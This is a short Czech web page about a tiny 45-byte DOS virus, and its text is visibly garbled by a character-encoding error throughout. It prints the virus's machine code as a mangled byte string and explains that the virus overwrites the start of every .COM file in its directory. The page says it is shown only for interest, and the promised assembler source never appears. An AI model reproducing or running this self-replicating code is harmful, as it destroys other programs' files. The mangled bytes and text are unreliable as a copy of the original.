Virus na 45 bajt╩ :-)


Upozorn┼n╔: Tato uk┴zka v├etn┼ vysv┼tlivek slou┌╔ pouze pro zaj╔mavost, nikoliv jako n┴vod na psan╔ vir╩!!

Tak vypad┴ kr┴tk┘ virus pro DOS (nebojte se, takhle je naprosto neËkodn┘):

║'┤N▒'═!s═ ║˛Ş=═!đ┤@▒-║═!┤>═!┤OŰÓ*.COM


Je tak jednoduch┘ a hloupou├k┘, ┌e se um╔ jenom mno┌it. Napad┴ postupn┼ vËechny ostatn╔ *.COM soubory v adres┴Ďi a pĎepisuje jejich za├┴tky s┴m sebou. Nem┴ re┴lnou Ëanci se rozË╔Ďit, jen┌e Ň├elem ho nebylo ud┼lat inteligentn╔, ale co nejkratË╔. SamozĎejm┼ se d┴ zkr┴tit jeËt┼ v╔c, ale ka┌dÎ takovÎ zkr┴cen╔ je v╩├i systÎmu nekorektn╔. Tot┴ln┼ oĎezan┘ vir m┼l sice jenom 28 bajt╩, ale v┼tËinou fungoval Ëpatn┼. Zdroj┴k v assembleru vypad┴ takhle:Zp┼t na hlavn╔ str┴nku
.